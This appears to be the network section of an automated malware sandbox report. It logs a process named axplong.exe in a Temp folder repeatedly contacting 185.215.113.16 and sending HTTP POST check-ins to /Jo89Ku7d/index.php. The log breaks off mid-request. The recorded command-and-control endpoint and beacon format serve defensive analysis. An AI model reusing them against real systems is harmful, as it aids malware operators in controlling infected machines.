                                                                  Sep 27, 2024 11:30:22.179419994 CEST6507580192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:22.179778099 CEST6507680192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:22.184686899 CEST8065075185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:22.184706926 CEST8065076185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:22.184773922 CEST6507580192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:22.184806108 CEST6507680192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:22.185002089 CEST6507680192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:22.189719915 CEST8065076185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:22.900418043 CEST8065076185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:22.900562048 CEST6507680192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:22.901308060 CEST6507680192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:22.906138897 CEST8065076185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:23.133434057 CEST8065076185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:23.133557081 CEST6507680192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:23.241760015 CEST6507680192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:23.242124081 CEST6507780192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:23.246972084 CEST8065076185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:23.246989012 CEST8065077185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:23.247062922 CEST6507680192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:23.247111082 CEST6507780192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:23.247329950 CEST6507780192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:23.252062082 CEST8065077185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:23.958262920 CEST8065077185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:23.958333015 CEST6507780192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:23.959089994 CEST6507780192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:23.963933945 CEST8065077185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:24.190504074 CEST8065077185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:24.190741062 CEST6507780192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:24.306631088 CEST6507780192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:24.306982040 CEST6507980192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:24.311719894 CEST8065077185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:24.311738968 CEST8065079185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:24.311774015 CEST6507780192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:24.311835051 CEST6507980192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:24.312181950 CEST6507980192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:24.316895008 CEST8065079185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:25.010644913 CEST8065079185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:25.010761976 CEST6507980192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:25.011596918 CEST6507980192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:25.016400099 CEST8065079185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:25.251305103 CEST8065079185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:25.251403093 CEST6507980192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:25.366764069 CEST6507980192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:25.367136002 CEST6508080192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:25.371957064 CEST8065079185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:25.372020960 CEST8065080185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:25.372085094 CEST6507980192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:25.372214079 CEST6508080192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:25.372445107 CEST6508080192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:25.377228022 CEST8065080185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:26.080391884 CEST8065080185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:26.080461979 CEST6508080192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:26.081221104 CEST6508080192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:26.086003065 CEST8065080185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:26.311265945 CEST8065080185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:26.311363935 CEST6508080192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:26.414267063 CEST6508080192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:26.414716005 CEST6508180192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:26.419609070 CEST8065080185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:26.419634104 CEST8065081185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:26.419703960 CEST6508080192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:26.419749022 CEST6508180192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:26.419950962 CEST6508180192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:26.424689054 CEST8065081185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:27.127243996 CEST8065081185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:27.127491951 CEST6508180192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:27.128163099 CEST6508180192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:27.133061886 CEST8065081185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:27.357180119 CEST8065081185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:27.357247114 CEST6508180192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:27.460650921 CEST6508180192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:27.460987091 CEST6508280192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:27.465955973 CEST8065081185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:27.465970039 CEST8065082185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:27.466121912 CEST6508180192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:27.466121912 CEST6508280192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:27.466196060 CEST6508280192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:27.471096039 CEST8065082185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:28.160341978 CEST8065082185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:28.160562992 CEST6508280192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:28.161339045 CEST6508280192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:28.166124105 CEST8065082185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:28.385201931 CEST8065082185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:28.385351896 CEST6508280192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:28.491724014 CEST6508280192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:28.492053986 CEST6508380192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:28.496921062 CEST8065083185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:28.496992111 CEST8065082185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:28.497004986 CEST6508380192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:28.497047901 CEST6508280192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:28.497158051 CEST6508380192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:28.501859903 CEST8065083185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:29.205689907 CEST8065083185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:29.205858946 CEST6508380192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:29.206495047 CEST6508380192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:29.211271048 CEST8065083185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:29.434858084 CEST8065083185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:29.434922934 CEST6508380192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:29.539191961 CEST6508380192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:29.539573908 CEST6508480192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:49.747169018 CEST6510280192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:49.747220039 CEST6510380192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:49.747351885 CEST6510380192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:49.752223969 CEST8065103185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:50.440229893 CEST8065103185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:50.440368891 CEST6510380192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:50.441426039 CEST6510380192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:50.448446989 CEST8065103185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:50.666389942 CEST8065103185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:50.666625977 CEST6510380192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:50.773156881 CEST6510380192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:50.773463964 CEST6510480192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:50.778501034 CEST8065104185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:50.778593063 CEST6510480192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:50.778670073 CEST8065103185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:50.778732061 CEST6510380192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:50.778734922 CEST6510480192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:50.783575058 CEST8065104185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:51.484373093 CEST8065104185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:51.484535933 CEST6510480192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:51.485218048 CEST6510480192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:51.491493940 CEST8065104185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:51.711504936 CEST8065104185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:51.711630106 CEST6510480192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:51.822233915 CEST6510480192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:51.822633028 CEST6510580192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:51.828073025 CEST8065104185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:51.828110933 CEST8065105185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:51.828172922 CEST6510480192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:51.828212023 CEST6510580192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:51.828345060 CEST6510580192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:51.835242033 CEST8065105185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:52.535466909 CEST8065105185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:52.535581112 CEST6510580192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:52.538497925 CEST6510580192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:52.543486118 CEST8065105185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:52.761044979 CEST8065105185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:52.761185884 CEST6510580192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:52.866976976 CEST6510580192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:52.867320061 CEST6510680192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:52.872209072 CEST8065106185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:52.872416973 CEST6510680192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:52.872567892 CEST6510680192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:52.872584105 CEST8065105185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:52.872642994 CEST6510580192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:52.877475023 CEST8065106185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:53.608582020 CEST8065106185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:53.608752966 CEST6510680192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:53.610451937 CEST6510680192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:53.615279913 CEST8065106185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:53.848117113 CEST8065106185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:53.848254919 CEST6510680192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:53.960628986 CEST6510680192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:53.961010933 CEST6510780192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:53.966818094 CEST8065106185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:53.966936111 CEST6510680192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:53.966963053 CEST8065107185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:53.967058897 CEST6510780192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:53.967271090 CEST6510780192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:53.973387957 CEST8065107185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:54.678500891 CEST8065107185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:54.678695917 CEST6510780192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:54.679599047 CEST6510780192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:54.684390068 CEST8065107185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:54.906187057 CEST8065107185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:54.906303883 CEST6510780192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:55.007354021 CEST6510780192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:55.007692099 CEST6510880192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:55.012648106 CEST8065108185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:55.012929916 CEST6510880192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:55.012929916 CEST6510880192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:55.012943983 CEST8065107185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:55.012996912 CEST6510780192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:55.017705917 CEST8065108185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:55.739972115 CEST8065108185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:55.740048885 CEST6510880192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:55.740757942 CEST6510880192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:55.745522022 CEST8065108185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:55.973352909 CEST8065108185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:55.973412037 CEST6510880192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:56.085556984 CEST6510880192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:56.085913897 CEST6510980192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:56.090749979 CEST8065109185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:56.090775013 CEST8065108185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:56.090825081 CEST6510980192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:56.090856075 CEST6510880192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:56.091054916 CEST6510980192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:56.095892906 CEST8065109185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:56.797980070 CEST8065109185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:56.798089981 CEST6510980192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:56.798801899 CEST6510980192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:56.803541899 CEST8065109185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:57.027661085 CEST8065109185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:57.027792931 CEST6510980192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:57.134656906 CEST6510980192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:57.135075092 CEST6511080192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:57.139898062 CEST8065109185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:57.139925003 CEST8065110185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:57.139946938 CEST6510980192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:57.140002012 CEST6511080192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:57.140134096 CEST6511080192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:57.144861937 CEST8065110185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:57.875601053 CEST8065110185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:57.875749111 CEST6511080192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:57.876549959 CEST6511080192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:57.881421089 CEST8065110185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:58.112724066 CEST8065110185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:58.112855911 CEST6511080192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:58.226089001 CEST6511080192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:58.226387024 CEST6511180192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:58.231273890 CEST8065111185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:58.231359005 CEST6511180192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:58.231367111 CEST8065110185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:58.231437922 CEST6511080192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:58.231508017 CEST6511180192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:58.236229897 CEST8065111185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:58.930130959 CEST8065111185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:58.930366993 CEST6511180192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:58.931102037 CEST6511180192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:58.935969114 CEST8065111185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:59.155163050 CEST8065111185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:59.155235052 CEST6511180192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:59.257400036 CEST6511180192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:59.257750034 CEST6511380192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:59.262670994 CEST8065113185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:59.262687922 CEST8065111185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:59.262747049 CEST6511380192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:59.262784958 CEST6511180192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:59.262922049 CEST6511380192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:59.267664909 CEST8065113185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:59.971185923 CEST8065113185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:59.971261024 CEST6511380192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:59.972007036 CEST6511380192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:59.977679968 CEST8065113185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:31:00.200732946 CEST8065113185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:31:00.200808048 CEST6511380192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:31:00.304517984 CEST6511380192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:31:00.304860115 CEST6511480192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:31:00.310350895 CEST8065113185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:31:00.310374975 CEST8065114185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:31:00.310453892 CEST6511380192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:31:00.310508966 CEST6511480192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:31:00.310723066 CEST6511480192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:31:00.315588951 CEST8065114185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:31:01.000776052 CEST8065114185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:31:01.000881910 CEST6511480192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:31:01.001719952 CEST6511480192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:31:01.006536961 CEST8065114185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:31:01.223706961 CEST8065114185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:31:01.223797083 CEST6511480192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:31:01.337555885 CEST6511480192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:31:01.337886095 CEST6511580192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:31:01.342753887 CEST8065114185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:31:01.342770100 CEST8065115185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:31:01.342823982 CEST6511480192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:31:01.342878103 CEST6511580192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:31:01.343229055 CEST6511580192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:31:01.348022938 CEST8065115185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:31:02.053611040 CEST8065115185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:31:02.053745985 CEST6511580192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:31:02.054727077 CEST6511580192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:31:02.059649944 CEST8065115185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:31:02.285742998 CEST8065115185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:31:02.285821915 CEST6511580192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:31:02.398336887 CEST6511580192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:31:02.398745060 CEST6511680192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:31:02.586182117 CEST8065116185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:31:02.586333990 CEST8065115185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:31:02.586330891 CEST6511680192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:31:02.586391926 CEST6511580192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:31:02.586646080 CEST6511680192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:31:02.591444016 CEST8065116185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:31:03.309027910 CEST8065116185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:31:03.309217930 CEST6511680192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:31:03.311400890 CEST6511680192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:31:03.316282034 CEST8065116185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:31:03.538702011 CEST8065116185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:31:03.538850069 CEST6511680192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:31:03.650249958 CEST6511680192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:31:03.650607109 CEST6511780192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:31:03.655528069 CEST8065117185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:31:03.655550957 CEST8065116185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:31:03.655611038 CEST6511780192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:31:03.655628920 CEST6511680192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:31:03.655917883 CEST6511780192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:31:03.660734892 CEST8065117185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:31:04.352302074 CEST8065117185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:31:04.352390051 CEST6511780192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:31:04.355447054 CEST6511780192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:31:04.360249996 CEST8065117185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:31:04.577923059 CEST8065117185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:31:04.577982903 CEST6511780192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:31:04.681601048 CEST6511780192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:31:04.681909084 CEST6511880192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:31:04.686702013 CEST8065118185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:31:04.686769962 CEST6511880192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:31:04.686887980 CEST8065117185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:31:04.686938047 CEST6511780192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:31:04.687051058 CEST6511880192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:31:04.691786051 CEST8065118185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:31:05.394244909 CEST8065118185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:31:05.394304037 CEST6511880192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:31:05.397620916 CEST6511880192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:31:05.402440071 CEST8065118185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:31:05.629041910 CEST8065118185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:31:05.629117966 CEST6511880192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:31:05.751822948 CEST6511880192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:31:05.752774000 CEST6511980192.168.2.6185.215.113.16
                                                                  Timestamp                             Source Port  Dest Port  Source IP     Dest IP
                                                                  Sep 27, 2024 11:29:53.326287985 CEST  53           50385      162.159.36.2  192.168.2.6
                                                                  Sep 27, 2024 11:29:54.514117002 CEST  53           65274      1.1.1.1       192.168.2.6
                                                                  • 185.215.113.16
                                                                  Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                  0           192.168.2.6  65060        185.215.113.16  80                1924  C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                  Timestamp  Bytes transferred  Direction  Data
                                                                  Sep 27, 2024 11:30:04.075659037 CEST  156  OUT  POST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 4
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 73 74 3d 73
                                                                  Data Ascii: st=s
                                                                  Sep 27, 2024 11:30:04.794305086 CEST  219  IN  HTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:04 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Refresh: 0; url = Login.php
                                                                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 1 0
                                                                  Sep 27, 2024 11:30:04.796751022 CEST  314  OUT  POST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 160
                                                                  Cache-Control: no-cache
